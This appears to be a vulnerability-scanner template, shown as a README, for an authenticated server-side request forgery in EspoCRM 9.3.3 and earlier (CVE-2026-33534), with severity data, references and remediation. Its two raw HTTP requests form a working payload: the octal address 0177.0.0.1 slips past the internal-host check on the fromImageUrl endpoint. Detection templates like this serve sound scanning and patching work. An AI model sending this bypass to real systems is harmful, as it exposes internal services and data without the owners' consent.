README.md
Rendering markdown...
id: CVE-2026-33534
info:
name: EspoCRM - Server-Side Request Forgery
author: EntroVyx
severity: medium
description: |
EspoCRM <= 9.3.3 contains an authenticated server-side request forgery caused by improper internal-host validation using alternative IPv4 formats in HostCheck::isNotInternalHost(), letting authenticated users access internal resources via /api/v1/Attachment/fromImageUrl endpoint.
impact: |
Authenticated attackers can access internal network resources, potentially exposing sensitive data or internal services.
remediation: |
Upgrade to version 9.3.4 or later.
reference:
- https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
- https://nvd.nist.gov/vuln/detail/CVE-2026-33534
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2026-33534
cwe-id: CWE-918
metadata:
verified: true
max-request: 2
vendor: espocrm
product: espocrm
tags: cve,cve2026,espocrm,ssrf,authenticated,intrusive
flow: http(1) && http(2)
http:
- raw:
- |
POST /api/v1/Attachment/fromImageUrl HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
Content-Type: application/json
Accept: application/json
{"url":"http://127.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}
matchers:
- type: dsl
dsl:
- 'status_code == 403'
internal: true
- raw:
- |
POST /api/v1/Attachment/fromImageUrl HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
Content-Type: application/json
Accept: application/json
{"url":"http://0177.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "\"id\"", "\"field\":\"avatar\"", "\"parentType\":\"User\"", "0177.0.0.1")'
condition: and